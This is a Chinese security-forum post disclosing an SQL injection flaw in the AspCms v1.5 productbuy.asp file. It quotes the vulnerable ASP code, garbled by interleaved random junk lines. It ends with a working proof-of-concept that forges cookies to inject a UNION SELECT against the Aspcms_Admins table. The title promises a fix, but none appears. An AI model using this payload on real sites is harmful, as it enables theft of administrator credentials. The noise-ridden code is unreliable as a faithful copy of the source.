AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
9 g/ {. x: p/ L8 O' R废话不多说，看代码：
  _/ P" B6 s7 D9 f4 y
7 r8 t# a4 U0 n9 V/ \<%
# U3 y: J0 x. `9 h: I6 }" I+ z
: e+ b/ x$ j% o- Y' ?if action = "buy" then
1 H+ o/ s' |( _. ]& \9 S
        addOrder()
# s. A; R0 q6 g3 V- I
- Y: y3 n6 B4 L4 i' b/ ]/ velse
! |/ g" z! P% d) a$ d
$ M9 h+ V8 E$ U5 `& L        echoContent()

/ c, O: A! A: N0 @3 Send if

$ u$ g1 |5 u- ?) J$ }
& t5 ]# a2 }1 f* d  E1 p: a
……略过


. a4 Z' s- v1 o, ^+ \
Sub echoContent()
0 ?/ A" ~9 E' F& ]
        dim id

        id=getForm("id","get")
7 Q* |7 b! S( x( s4 c
        

        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
4 e1 v0 }) C. s5 R$ f( c* |
        
4 |/ F8 L8 a: V+ r0 s
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
+ i5 [; y; ?! c/ X0 W5 Y, Q* [
, h- q: _4 j  C. s) M6 s6 ?        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
( [1 Y0 L. P& r( S% P, b# I
3 e2 y& _" k* K. @1 B& W1 ~        Dim templatePath,tempStr
! v; P# C, @: B
        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
$ `- u' d% D" S3 X- d3 |  z" o; T) L
  M2 W9 {- p) x) Y9 P  M$ @  v
: f& D! X1 l( |; [. n5 T# c
        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")

6 M! m4 U6 Y( Y: X3 C4 i/ z        selectproduct=rsObj(0)

        

        Dim linkman,gender,phone,mobile,email,qq,address,postcode

3 i' ?( m/ Q7 T; v- A9 A! O. B        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

        if rCookie("loginstatus")=1 then  

% o# h" [; w7 k+ G# s& R                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
* J+ e6 m/ [6 q8 R* B
                linkman=rsObj("truename")

, v6 m2 |* O% ?                gender=rsObj("gender")
3 K  c# m! H0 q# I( J
8 u( F2 c; Q9 t                phone=rsObj("phone")
/ J* J6 T5 v  K- Y/ ~  R
                mobile=rsObj("mobile")
* B" P1 `3 ~% b4 S% |! n
                email=rsObj("email")
: J  F0 P) o: ]
                qq=rsObj("qq")
" I9 |3 t& @8 ^
                address=rsObj("address")
+ t- Y9 y8 q# I1 W& C9 U5 w
' T: m5 U5 v2 R# W+ i8 _* ?                postcode=rsObj("postcode")

        else
, V; Y6 H5 v6 O2 ]. g+ [. b
                gender=1
2 z! N7 t  H8 O+ J& }; h
9 U) U* Z- X9 [. }6 v        end if

6 }! F9 U6 G1 W9 J( e4 Z! t        rsObj.close()
' _3 n& O3 I, o4 @: t+ P' c5 |  H
               
, w2 J3 {% r$ r6 P$ T
* T' _! A; W% }        with templateObj
2 l) W3 r6 u* z
& t& N6 w2 `7 h" w# Y                .content=loadFile(templatePath)        
" I$ y! G, u" g/ \& A6 ^7 m
+ Z. _7 j! \- a                .parseHtml()
5 g. R' m$ v: ]5 a6 E8 P" ?( T
9 W! Y; j- C" u; J9 W  N                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
9 i/ y3 Z9 r# B7 q4 f4 x/ d# r
                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
! c) F5 [9 {  K1 H# Y, Y6 g3 O
                .content=replaceStr(.content,"[aspcms:gender]",gender)               

1 Z2 q/ K3 s  o' V" X6 S3 d( P                .content=replaceStr(.content,"[aspcms:phone]",phone)               
; Q" t6 p3 P  m/ t: W: s
* k6 P8 I. Z* `) Q5 A                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               
. p% R2 F/ X" q1 Y9 B
                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
# _7 R& Q2 z; `: H: Z* m
                .content=replaceStr(.content,"[aspcms:address]",address)                        
9 W! G$ T- o. C; e) C; |" S1 Z3 y
* e( t' l) F) o- R/ J- D% u4 D                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        

' _. f0 f* x3 l+ p                .parseCommon()                 

; {& h( j9 L# t                echo .content

6 W5 S9 T. T0 i% B        end with
7 J/ t! k! u( w  D: k( p# |
! b& G8 ~/ E7 K& X6 ]! B: `0 h        set templateobj =nothing : terminateAllObjects

' C0 J1 Z( E9 f  `! \! t4 \End Sub
- l+ v3 I6 d: n: {3 q( {) s( P( g' Q3 y漏洞很明显，没啥好说的
0 {8 ~  J/ J5 W$ D9 ]4 x  q5 d8 Y6 Wpoc：
! f+ {: i8 n3 o5 G4 `
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​
1 s! n( w3 x! f( M) ?